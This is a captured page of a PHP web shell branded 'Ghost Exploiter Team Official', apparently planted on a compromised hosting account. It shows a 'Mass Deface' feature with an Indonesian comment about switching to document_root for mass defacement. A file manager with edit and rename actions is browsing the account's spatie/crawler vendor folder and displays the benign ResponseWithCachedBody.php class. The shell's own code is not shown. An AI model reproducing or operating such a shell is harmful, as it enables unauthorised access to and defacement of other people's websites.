webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
spatie
/
crawler
/
src
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
CrawlObservers
--
ren
CrawlProfiles
--
ren
CrawlQueues
--
ren
Exceptions
--
ren
Handlers
--
ren
CrawlUrl.php
0.744KB
edt
ren
Crawler.php
13.223KB
edt
ren
CrawlerRobots.php
1.137KB
edt
ren
LinkAdder.php
3.228KB
edt
ren
ResponseWithCachedBody.php
0.717KB
edt
ren
<?php namespace Spatie\Crawler; use GuzzleHttp\Psr7\Response; use Psr\Http\Message\ResponseInterface; class ResponseWithCachedBody extends Response { protected ?string $cachedBody = null; public static function fromGuzzlePsr7Response(ResponseInterface $response): static { return new static( $response->getStatusCode(), $response->getHeaders(), $response->getBody(), $response->getProtocolVersion(), $response->getReasonPhrase() ); } public function setCachedBody(?string $body = null): void { $this->cachedBody = $body; } public function getCachedBody(): ?string { return $this->cachedBody; } }